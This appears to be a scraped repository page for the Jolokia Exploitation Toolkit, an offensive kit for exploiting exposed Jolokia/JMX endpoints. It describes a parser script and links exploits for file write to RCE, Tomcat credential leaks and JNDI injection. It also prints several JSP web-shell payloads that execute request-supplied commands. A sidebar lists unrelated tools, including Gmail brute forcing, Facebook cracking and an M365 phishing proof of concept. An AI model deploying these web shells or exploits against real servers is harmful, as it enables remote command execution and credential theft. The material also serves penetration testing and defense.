Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Related tags

Security related resourcesjolokia-exploitation-toolkit
Overview

jolokia-exploitation-toolkit

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

jolokia

Core concept

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

Where to find jolokia

  1. Java projects
  2. /jolokia
  3. /actuator/jolokia
  4. ???

Test setup

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

Setup & Usage

# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst
# Use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC  : Represents  the MBean server from the management point of view.
[+] DESC  : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC  : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC  : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC  : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC  : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC  : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC  : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC  : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC  : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC  : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]

Java & JSP payloads

<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %> "> 
<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

Contributors & Content

  • @TheLaluka
    • jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
    • exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
    • exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
    • exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
  • @Coiffeur0x90
    • exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
    • exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
    • exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
  • @mpgn_x64
    • exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
  • RicterZ
    • exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
  • @lely__
    • exploits/jndi-ldap-target.md | RMI injection with java.lang:type=Memory
  • You should be here? Let me know and I'll fix that!

Sources & References

Owner
Laluka
Black Hat ? Hello no ! Black Cat.
Laluka
GitHub Repository
Holehe OSINT - Email to Registered Accounts

holehe allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function.

Palenath 3.8k Jan 06, 2023
Tools ini digunakan untuk krekk pacebuk:v

E-Crack By Aang-XD Fitur Login • Login via token facebook • Login via cookie facebook Install On Termux $ pkg update && pkg upgrade $ pkg install pyth

Aang Ardiansyah-XD 2 Dec 24, 2021
IDA Pro Python plugin to analyze and annotate Linux kernel alternatives

About This is an IDA Pro (Interactive Disassembler) plugin allowing to automatically analyze and annotate Linux kernel alternatives (content of .altin

Open Source Security, Inc. 16 Oct 12, 2022
Gefilte Fish GMail filter creator

Gefilte Fish: GMail filter maker Gefilte Fish automates the creation of GMail filters. Use it like this: from gefilte import GefilteFish,

Ned Batchelder 31 Sep 28, 2022
NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network

NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network. It applies to all linux operating systems. And it is improving every day, new packages are added. Than

Error 263 Jan 01, 2023
Crypto Meta Extractor

Crypto Meta Extractor This repository contains the code which extracts some metadata of all the cryptocurrencies listed (9K) on CoinMarketCap. Coding

Samyak Jain 3 Jul 03, 2022
SpiderFoot automates OSINT collection so that you can focus on analysis.

SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

Steve Micallef 9k Jan 08, 2023
威胁情报播报

Threat-Broadcast 威胁情报播报 运行环境 项目介绍 从以下公开的威胁情报来源爬取并整合最新信息: 360:https://cert.360.cn/warning 奇安信:https://ti.qianxin.com/advisory/ 红后:https://redqueen.tj-u

东方有鱼名为咸 148 Nov 09, 2022
Password Manager is a simple Python project which helps users in managing their passwords in a easier way

Password Manager is a simple Python project which helps users in managing their passwords in a easier way

Manish Jalui 4 Sep 29, 2021
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798

Pedro Havay 12 Nov 18, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Gmail Accounts Hacking

gmail-hack Gmail Accounts Hacking Gemail-Hack python script for Hack gmail account brute force What is brute force attack? In brute force attack,scrip

Aryan 25 Nov 10, 2022
Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack

O365DevicePhish Microsoft365_devicePhish Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack This is a simple proof-of-concept script t

Trewis [work] Scotch 4 Sep 23, 2022
A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚

log4check A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚 Tested to work between Minecraft versions 1.12.2 a

Evan J. Markowitz 4 Dec 23, 2021
PassLock is a medium-security password manager that encrypts passwords using Advanced Encryption Standards (AES)

A medium security python password manager that encrypt passwords using Advanced Encryption Standard (AES) PassLock is a password manager and password

Akshay Vs 44 Nov 18, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
A web-app helping to create strong passwords that are easy to remember.

This is a simple Web-App that demonstrates a method of creating strong passwords that are still easy to remember. It also provides time estimates how long it would take an attacker to crack a passwor

2 Jun 04, 2021
ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023
A security system to warn you when people enter your room 🎥

Get Out My Room v0.1 I hate people coming in my room when i'm not there. Get Out My Room is a simple security system that sends notifications with vid

ScriptLine 1 Jan 11, 2022
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 09, 2022